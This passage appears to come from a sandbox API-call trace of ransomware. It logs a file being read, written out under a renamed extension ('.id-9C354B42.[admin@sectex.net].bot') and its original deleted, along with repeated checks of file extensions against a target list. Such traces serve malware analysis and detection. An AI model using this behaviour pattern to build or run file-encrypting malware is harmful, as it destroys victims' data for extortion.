	[0035.631] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1682) returned 1
	[0035.631] CloseHandle (hObject=0x18c) returned 1
	[0035.631] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png")) returned 0x20
	[0035.632] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.632] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0035.632] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.632] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.632] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0035.632] GetLastError () returned 0x0
	[0035.632] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x692, lpOverlapped=0x0) returned 1
	[0035.634] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x6a0, lpOverlapped=0x0) returned 1
	[0035.635] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0035.635] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0035.636] SetEndOfFile (hFile=0x180) returned 1
	[0035.636] CloseHandle (hObject=0x180) returned 1
	[0035.817] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.817] SetEndOfFile (hFile=0x18c) returned 1
	[0035.929] CloseHandle (hObject=0x18c) returned 1
	[0035.929] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0035.929] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png")) returned 1
	[0035.929] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61
	[0035.929] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61
	[0035.929] lstrlenW (lpString=".doc") returned 4
	[0035.929] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0035.929] lstrlenW (lpString=".docx") returned 5
	[0035.929] lstrcmpiW (lpString1=".docx", lpString2="S.PNG") returned -1
	[0035.929] lstrlenW (lpString=".pdf") returned 4
	[0035.929] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0035.930] lstrlenW (lpString=".xls") returned 4
	[0035.930] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0035.930] lstrlenW (lpString=".xlsx") returned 5
	[0035.930] lstrcmpiW (lpString1=".xlsx", lpString2="S.PNG") returned -1
	[0035.930] lstrlenW (lpString=".ppt") returned 4
	[0035.930] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0035.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61
	[0035.930] lstrlenW (lpString=".zip") returned 4
	[0035.930] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0035.930] lstrlenW (lpString=".rar") returned 4
	[0035.930] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0035.930] lstrlenW (lpString=".bz2") returned 4
	[0035.930] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0035.930] lstrlenW (lpString=".7z") returned 3
	[0035.930] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0035.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61
	[0035.930] lstrlenW (lpString=".dbf") returned 4
	[0035.930] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0035.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61
	[0035.930] lstrlenW (lpString=".1cd") returned 4
	[0035.930] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0035.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61
	[0035.930] lstrlenW (lpString=".jpg") returned 4
	[0035.930] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0035.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61
	[0035.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61
	[0035.930] lstrlenW (lpString=".doc") returned 4
	[0035.930] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0035.930] lstrlenW (lpString=".docx") returned 5
	[0035.930] lstrcmpiW (lpString1=".docx", lpString2="S.PNG") returned -1
	[0035.930] lstrlenW (lpString=".pdf") returned 4
	[0035.930] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0035.930] lstrlenW (lpString=".xls") returned 4
	[0035.930] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0035.931] lstrlenW (lpString=".xlsx") returned 5
	[0035.931] lstrcmpiW (lpString1=".xlsx", lpString2="S.PNG") returned -1
	[0035.931] lstrlenW (lpString=".ppt") returned 4
	[0035.931] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0035.931] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61
	[0035.931] lstrlenW (lpString=".zip") returned 4
	[0035.931] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0035.931] lstrlenW (lpString=".rar") returned 4
	[0035.931] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0035.931] lstrlenW (lpString=".bz2") returned 4
	[0035.931] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0035.931] lstrlenW (lpString=".7z") returned 3
	[0035.931] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0035.931] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61
	[0035.931] lstrlenW (lpString=".dbf") returned 4
	[0035.931] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0035.931] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61
	[0035.931] lstrlenW (lpString=".1cd") returned 4
	[0035.931] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0035.931] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61
	[0035.931] lstrlenW (lpString=".jpg") returned 4
	[0035.931] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0035.931] lstrcmpiW (lpString1=".avi", lpString2=".bot") returned -1
	[0035.931] lstrlenW (lpString="boxed-join.avi") returned 14
	[0035.931] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0035.981] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=33280) returned 1
	[0035.981] CloseHandle (hObject=0x1a8) returned 1
	[0035.981] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0x20
	[0035.981] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.981] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0035.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0035.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0035.981] lstrlenW (lpString=".doc") returned 4
	[0035.981] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0035.981] lstrlenW (lpString=".docx") returned 5
	[0035.981] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1
	[0035.981] lstrlenW (lpString=".pdf") returned 4
	[0035.981] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0035.981] lstrlenW (lpString=".xls") returned 4
	[0035.982] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0035.982] lstrlenW (lpString=".xlsx") returned 5
	[0035.982] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1
	[0035.982] lstrlenW (lpString=".ppt") returned 4
	[0035.982] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0035.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0035.982] lstrlenW (lpString=".zip") returned 4
	[0035.982] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0035.982] lstrlenW (lpString=".rar") returned 4
	[0035.982] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0035.982] lstrlenW (lpString=".bz2") returned 4
	[0035.982] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0035.982] lstrlenW (lpString=".7z") returned 3
	[0035.982] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0035.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0035.982] lstrlenW (lpString=".dbf") returned 4
	[0035.982] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0035.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0035.982] lstrlenW (lpString=".1cd") returned 4
	[0035.982] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0035.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0035.982] lstrlenW (lpString=".jpg") returned 4
	[0035.982] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0035.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0035.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0035.982] lstrlenW (lpString=".doc") returned 4
	[0035.982] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0035.982] lstrlenW (lpString=".docx") returned 5
	[0035.982] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1
	[0035.982] lstrlenW (lpString=".pdf") returned 4
	[0035.982] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0035.982] lstrlenW (lpString=".xls") returned 4
	[0035.982] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0035.983] lstrlenW (lpString=".xlsx") returned 5
	[0035.983] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1
	[0035.983] lstrlenW (lpString=".ppt") returned 4
	[0035.983] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0035.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0035.983] lstrlenW (lpString=".zip") returned 4
	[0035.983] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0035.983] lstrlenW (lpString=".rar") returned 4
	[0035.983] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0035.983] lstrlenW (lpString=".bz2") returned 4
	[0035.983] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0035.983] lstrlenW (lpString=".7z") returned 3
	[0035.983] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0035.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0035.983] lstrlenW (lpString=".dbf") returned 4
	[0035.983] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0035.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0035.983] lstrlenW (lpString=".1cd") returned 4
	[0035.983] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0035.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0035.983] lstrlenW (lpString=".jpg") returned 4
	[0035.983] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0035.983] lstrcmpiW (lpString1=".avi", lpString2=".bot") returned -1
	[0035.983] lstrlenW (lpString="correct.avi") returned 11
	[0035.983] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0035.984] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=197120) returned 1
	[0035.984] CloseHandle (hObject=0x1a8) returned 1
	[0035.985] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi")) returned 0x20
	[0035.985] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.986] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0035.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0035.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0035.986] lstrlenW (lpString=".doc") returned 4
	[0035.986] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0035.986] lstrlenW (lpString=".docx") returned 5
	[0035.986] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1
	[0035.986] lstrlenW (lpString=".pdf") returned 4
	[0035.986] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0035.986] lstrlenW (lpString=".xls") returned 4
	[0035.986] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0035.986] lstrlenW (lpString=".xlsx") returned 5
	[0035.986] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1
	[0035.986] lstrlenW (lpString=".ppt") returned 4
	[0035.986] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0035.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0035.986] lstrlenW (lpString=".zip") returned 4
	[0035.986] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0035.986] lstrlenW (lpString=".rar") returned 4
	[0035.986] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0035.986] lstrlenW (lpString=".bz2") returned 4
	[0035.986] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0035.986] lstrlenW (lpString=".7z") returned 3
	[0035.986] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0035.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0035.986] lstrlenW (lpString=".dbf") returned 4
	[0035.986] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0035.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0035.986] lstrlenW (lpString=".1cd") returned 4
	[0035.986] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0035.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0035.986] lstrlenW (lpString=".jpg") returned 4
	[0035.986] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0035.987] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0035.987] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0035.987] lstrlenW (lpString=".doc") returned 4
	[0035.987] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0035.987] lstrlenW (lpString=".docx") returned 5
	[0035.987] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1
	[0035.987] lstrlenW (lpString=".pdf") returned 4
	[0035.987] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0035.987] lstrlenW (lpString=".xls") returned 4
	[0035.987] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0035.987] lstrlenW (lpString=".xlsx") returned 5
	[0035.987] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1
	[0035.987] lstrlenW (lpString=".ppt") returned 4
	[0035.987] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0035.987] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0035.987] lstrlenW (lpString=".zip") returned 4
	[0035.987] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0035.987] lstrlenW (lpString=".rar") returned 4
	[0035.987] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0035.987] lstrlenW (lpString=".bz2") returned 4
	[0035.987] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0035.987] lstrlenW (lpString=".7z") returned 3
	[0035.987] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0035.987] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0035.987] lstrlenW (lpString=".dbf") returned 4
	[0035.987] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0035.987] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0035.987] lstrlenW (lpString=".1cd") returned 4
	[0035.987] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0035.987] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0035.987] lstrlenW (lpString=".jpg") returned 4
	[0035.987] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0035.988] lstrcmpiW (lpString1=".avi", lpString2=".bot") returned -1
	[0035.988] lstrlenW (lpString="delete.avi") returned 10
	[0035.988] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0036.324] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=224256) returned 1
	[0036.324] CloseHandle (hObject=0x18c) returned 1
	[0036.324] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi")) returned 0x20
	[0036.324] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0036.324] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0036.324] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0036.324] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0036.324] lstrlenW (lpString=".doc") returned 4
	[0036.324] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0036.324] lstrlenW (lpString=".docx") returned 5
	[0036.324] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1
	[0036.325] lstrlenW (lpString=".pdf") returned 4
	[0036.325] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0036.325] lstrlenW (lpString=".xls") returned 4
	[0036.325] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0036.325] lstrlenW (lpString=".xlsx") returned 5
	[0036.325] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1
	[0036.325] lstrlenW (lpString=".ppt") returned 4
	[0036.325] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0036.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0036.325] lstrlenW (lpString=".zip") returned 4
	[0036.325] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0036.325] lstrlenW (lpString=".rar") returned 4
	[0036.325] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0036.325] lstrlenW (lpString=".bz2") returned 4
	[0036.325] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0036.325] lstrlenW (lpString=".7z") returned 3
	[0036.325] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0036.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0036.325] lstrlenW (lpString=".dbf") returned 4
	[0036.325] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0036.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0036.325] lstrlenW (lpString=".1cd") returned 4
	[0036.325] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0036.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0036.325] lstrlenW (lpString=".jpg") returned 4
	[0036.325] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0036.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0036.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0036.325] lstrlenW (lpString=".doc") returned 4
	[0036.325] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0036.325] lstrlenW (lpString=".docx") returned 5
	[0036.325] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1
	[0036.325] lstrlenW (lpString=".pdf") returned 4
	[0036.326] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0036.326] lstrlenW (lpString=".xls") returned 4
	[0036.326] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0036.326] lstrlenW (lpString=".xlsx") returned 5
	[0036.326] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1
	[0036.326] lstrlenW (lpString=".ppt") returned 4
	[0036.326] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0036.326] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0036.326] lstrlenW (lpString=".zip") returned 4
	[0036.326] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0036.326] lstrlenW (lpString=".rar") returned 4
	[0036.326] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0036.326] lstrlenW (lpString=".bz2") returned 4
	[0036.326] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0036.326] lstrlenW (lpString=".7z") returned 3
	[0036.326] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0036.326] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0036.326] lstrlenW (lpString=".dbf") returned 4
	[0036.326] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0036.326] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0036.326] lstrlenW (lpString=".1cd") returned 4
	[0036.326] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0036.326] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0036.326] lstrlenW (lpString=".jpg") returned 4
	[0036.326] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0036.326] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0036.326] lstrlenW (lpString="symbase.xml") returned 11
	[0036.326] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
